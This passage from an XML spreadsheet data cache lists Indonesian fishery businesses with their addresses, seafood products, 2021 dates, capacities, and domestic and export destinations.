    <s v="Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="25853"/>
    <x v="1237"/>
    <s v="PT. ANDIRA INTERNUSA GEMILANG"/>
    <s v="Jl. Jawa Blok G-1, Kel. Ganda Mekar, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Kuwe, Kerapu, Kakap)"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="25855"/>
    <x v="1237"/>
    <s v="PT. ANDIRA INTERNUSA GEMILANG"/>
    <s v="Jl. Jawa Blok G-1, Kel. Ganda Mekar, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Beku"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="25856"/>
    <x v="328"/>
    <s v="PT. SAMUDERA INDONESIA COLDSTORINDO"/>
    <s v="Kawasan Industri Karyadeka Panca Murni Kav C2 Kp. Pasir Konci RT 015 RW 005, Kel. Pasir Sari, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Cakalang)"/>
    <d v="2021-06-23T00:00:00"/>
    <n v="3000"/>
    <s v="Kabupaten Bekasi"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="25857"/>
    <x v="1238"/>
    <s v="PT. EDMAR MANDIRI JAYA"/>
    <s v="Pergudangan Safe N Lock Blok V 3128-3130, Jl Lingkar Timur Km 5,5, Kel. Rangkahkidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Deho, Terbang, Kembung, Salem, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="2477000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="25858"/>
    <x v="1238"/>
    <s v="PT. EDMAR MANDIRI JAYA"/>
    <s v="Pergudangan Safe N Lock Blok V 3128-3130, Jl Lingkar Timur Km 5,5, Kel. Rangkahkidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Bandeng, Patin, Nila)"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="American Samoa, China, Hong Kong, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="25859"/>
    <x v="1238"/>
    <s v="PT. EDMAR MANDIRI JAYA"/>
    <s v="Pergudangan Safe N Lock Blok V 3128-3130, Jl Lingkar Timur Km 5,5, Kel. Rangkahkidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="25860"/>
    <x v="1238"/>
    <s v="PT. EDMAR MANDIRI JAYA"/>
    <s v="Pergudangan Safe N Lock Blok V 3128-3130, Jl Lingkar Timur Km 5,5, Kel. Rangkahkidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Katamba, Kerapu, Kakatua, Bawal, Kakap, Kurisi)"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="25861"/>
    <x v="1238"/>
    <s v="PT. EDMAR MANDIRI JAYA"/>
    <s v="Pergudangan Safe N Lock Blok V 3128-3130, Jl Lingkar Timur Km 5,5, Kel. Rangkahkidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="25862"/>
    <x v="1238"/>
    <s v="PT. EDMAR MANDIRI JAYA"/>
    <s v="Pergudangan Safe N Lock Blok V 3128-3130, Jl Lingkar Timur Km 5,5, Kel. Rangkahkidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="168000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="25866"/>
    <x v="1239"/>
    <s v="PT. JALADRI PRO SOLUSI"/>
    <s v="Kawasan Industri Perikanan Samudera Blok K Kav 1, Jl. Muara Baru Ujung (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Kerapu, Layur, Kakap Merah)"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap"/>
    <m/>
  </r>
  <r>
    <n v="25867"/>
    <x v="1239"/>
    <s v="PT. JALADRI PRO SOLUSI"/>
    <s v="Kawasan Industri Perikanan Samudera Blok K Kav 1, Jl. Muara Baru Ujung (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Kembung, Salem, Cakalang, Selar Kuning)"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="45000"/>
    <s v="Kota Jakarta Utara, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25868"/>
    <x v="1239"/>
    <s v="PT. JALADRI PRO SOLUSI"/>
    <s v="Kawasan Industri Perikanan Samudera Blok K Kav 1, Jl. Muara Baru Ujung (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25869"/>
    <x v="1239"/>
    <s v="PT. JALADRI PRO SOLUSI"/>
    <s v="Kawasan Industri Perikanan Samudera Blok K Kav 1, Jl. Muara Baru Ujung (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Utara, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25891"/>
    <x v="407"/>
    <s v="CV. LAUTAN MAS"/>
    <s v="Jl. Pulau Nias Selatan No.1 KIM 3, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Kembung, Salem, Aso-aso)"/>
    <d v="2021-06-23T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <m/>
  </r>
  <r>
    <n v="25893"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No. 23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25894"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No. 23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kakap Merah, Kakap)"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="2300"/>
    <m/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25895"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No. 23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kakap Merah, Kakap)"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="7500"/>
    <m/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25896"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No. 23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Layur, Lemadang, Tenggiri)"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="750"/>
    <m/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25897"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No. 23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Layur, Lemadang, Tenggiri)"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="9000"/>
    <m/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25898"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No. 23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Segar"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="7500"/>
    <s v="Kota Jakarta Pusat, Kota Makassar"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25899"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No. 23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Beku"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Jakarta Pusat, Kota Makassar"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25900"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No. 23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="50"/>
    <s v="Kota Makassar"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25901"/>
    <x v="176"/>
    <s v="PT. BIRU LAUT NUSANTARA"/>
    <s v="Jl. Kima 8 Kav SS No. 23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="50"/>
    <s v="Kota Makassar"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25903"/>
    <x v="1240"/>
    <s v="PT. UNITY SAMUDRA INDONESIA"/>
    <s v="Jl. Taman Mahardika No.26, Kel. Benoa, Kec. Kuta Selatan, Kabupaten Badung&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Canada, China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25904"/>
    <x v="1240"/>
    <s v="PT. UNITY SAMUDRA INDONESIA"/>
    <s v="Jl. Taman Mahardika No.26, Kel. Benoa, Kec. Kuta Selatan, Kabupaten Badung&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerapu Hidup"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25905"/>
    <x v="1240"/>
    <s v="PT. UNITY SAMUDRA INDONESIA"/>
    <s v="Jl. Taman Mahardika No. 26 Nusa Dua, Kel. Benoa, Kec. Kuta Selatan, Kabupaten Badung&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Lobster Hidup"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Canada, China, Hong Kong, Korea, Republic of, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25906"/>
    <x v="1240"/>
    <s v="PT. UNITY SAMUDRA INDONESIA"/>
    <s v="Jl. Taman Mahardika No.26, Kel. Benoa, Kec. Kuta Selatan, Kabupaten Badung&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kepiting Hidup"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25907"/>
    <x v="1240"/>
    <s v="PT. UNITY SAMUDRA INDONESIA"/>
    <s v="Jl. Taman Mahardika No.26, Kel. Benoa, Kec. Kuta Selatan, Kabupaten Badung&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Kerisi, Kerapu, Layur, Bawal, Kakap)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25908"/>
    <x v="1240"/>
    <s v="PT. UNITY SAMUDRA INDONESIA"/>
    <s v="Jl. Taman Mahardika No.26, Kel. Benoa, Kec. Kuta Selatan, Kabupaten Badung&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Teri, Lemuru, Tongkol, Terbang, Tembang, Kembung)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Canada, China, Hong Kong, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25909"/>
    <x v="1240"/>
    <s v="PT. UNITY SAMUDRA INDONESIA"/>
    <s v="Jl. Taman Mahardika No.26, Kel. Benoa, Kec. Kuta Selatan, Kabupaten Badung&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerang Hidup"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25910"/>
    <x v="1240"/>
    <s v="PT. UNITY SAMUDRA INDONESIA"/>
    <s v="Jl. Taman Mahardika No.26, Kel. Benoa, Kec. Kuta Selatan, Kabupaten Badung&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Keong Hidup"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malawi, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25911"/>
    <x v="1241"/>
    <s v="USAHA LOBSTER WATI"/>
    <s v="Jl. Abraham O. Atururi, Kel. Suprauw, Kec. Maladum Mes, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Lobster Hidup"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="8000"/>
    <s v="Kota Jakarta Pusat, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="25913"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Abalon Segar"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25922"/>
    <x v="1242"/>
    <s v="PT. ANUGERAH MAPAN JAYA"/>
    <s v="Jl. Poros Kariango, Dusun Majannang, Kel. Kurusumange, Kec. Tanralili, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Alkali Treated Cottonii Chips"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="1200000"/>
    <s v="Kota Surabaya"/>
    <s v="Russian Federation, United States"/>
  </r>
  <r>
    <n v="25923"/>
    <x v="1243"/>
    <s v="UD. JUANDA AQUATIC"/>
    <s v="Jl. Puri No.24, Kel. Kotamatsum III, Kec. Medan kota, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Air Tawar Beku (Jurung, Betutu)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Medan, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="25924"/>
    <x v="1244"/>
    <s v="PT. BERKAT NISA SURA BIMA"/>
    <s v="Dusun Palikaja RT 14 RW 05, Kel. Laju, Kec. Langgudu, Kabupaten Bima&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-06-28T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="25926"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Belut Segar"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25927"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25931"/>
    <x v="1245"/>
    <s v="USAHA HASIL LAUT RUDI"/>
    <s v="Jl. Macan Tutul RT 001 RW 001, Kel. Dum Barat, Kec. Sorong Kepulauan, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Lobster Hidup"/>
    <d v="2021-06-09T00:00:00"/>
    <n v="7000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="25932"/>
    <x v="1246"/>
    <s v="PT. NAGA LAUT TIMUR"/>
    <s v="Jl. Raya Tuban ‚Äì Semarang Km 57, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Mata Besar, Gulama, Lousan, Kerapu, Remang, Layur, Sukang)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1500000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="25933"/>
    <x v="1246"/>
    <s v="PT. NAGA LAUT TIMUR"/>
    <s v="Jl. Raya Tuban ‚Äì Semarang Km 57, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="25934"/>
    <x v="1246"/>
    <s v="PT. NAGA LAUT TIMUR"/>
    <s v="Jl. Raya Tuban ‚Äì Semarang Km 57, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="25935"/>
    <x v="1246"/>
    <s v="PT. NAGA LAUT TIMUR"/>
    <s v="Jl. Raya Tuban ‚Äì Semarang Km 57, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="3000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="25936"/>
    <x v="1246"/>
    <s v="PT. NAGA LAUT TIMUR"/>
    <s v="Jl. Raya Tuban ‚Äì Semarang Km 57, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Scallop Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="25937"/>
    <x v="1246"/>
    <s v="PT. NAGA LAUT TIMUR"/>
    <s v="Jl. Raya Tuban ‚Äì Semarang Km 57, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Lobster Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="25938"/>
    <x v="1246"/>
    <s v="PT. NAGA LAUT TIMUR"/>
    <s v="Jl. Raya Tuban ‚Äì Semarang Km 57, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Hiu Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="200"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="25939"/>
    <x v="1246"/>
    <s v="PT. NAGA LAUT TIMUR"/>
    <s v="Jl. Raya Tuban ‚Äì Semarang Km 57, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Rajungan Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="25941"/>
    <x v="1247"/>
    <s v="UD. JEMBATAN PURI"/>
    <s v="Jl. Puri Komplek PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="70000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25942"/>
    <x v="1247"/>
    <s v="UD. JEMBATAN PURI"/>
    <s v="Jl. Puri Komplek PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Beku (Barramundi, Kerapu, Kakap)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25943"/>
    <x v="1247"/>
    <s v="UD. JEMBATAN PURI"/>
    <s v="Jl. Puri Komplek PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Deho, Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="25944"/>
    <x v="1247"/>
    <s v="UD. JEMBATAN PURI"/>
    <s v="Jl. Puri Komplek PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Beku"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25945"/>
    <x v="1247"/>
    <s v="UD. JEMBATAN PURI"/>
    <s v="Jl. Puri Komplek PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25953"/>
    <x v="1248"/>
    <s v="CV. FAMILI RAJA UDANG"/>
    <s v="Jl. Persatuan Gg Keladi No.61 RT 47, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Udang Segar"/>
    <d v="2021-06-16T00:00:00"/>
    <n v="18000"/>
    <s v="Kota Batam, Kota Jakarta Barat"/>
    <s v="China, Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25954"/>
    <x v="1248"/>
    <s v="CV. FAMILI RAJA UDANG"/>
    <s v="Jl. Persatuan Gg Keladi No.61 RT 47, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Ikan Demersal Segar (Kerapu, Bawal, Kakap)"/>
    <d v="2021-06-16T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Batam, Kota Jakarta Barat"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25955"/>
    <x v="1248"/>
    <s v="CV. FAMILI RAJA UDANG"/>
    <s v="Jl. Persatuan Gg Keladi No.61 RT 47, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2021-06-16T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Batam, Kota Jakarta Barat"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25957"/>
    <x v="1248"/>
    <s v="CV. FAMILI RAJA UDANG"/>
    <s v="Jl. Persatuan Gg Keladi No.61 RT 47, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Udang Beku"/>
    <d v="2021-06-16T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Barat"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25996"/>
    <x v="1249"/>
    <s v="KOPERASI NELAYAN SARUMA PESISIR JAYA"/>
    <s v="Desa Sayoang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap, Layur)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Bitung, Kota Ternate"/>
    <s v="China, Korea, Democratic People's Republic of, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="25997"/>
    <x v="1249"/>
    <s v="KOPERASI NELAYAN SARUMA PESISIR JAYA"/>
    <s v="Desa Sayoang, Kel. Sayoang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
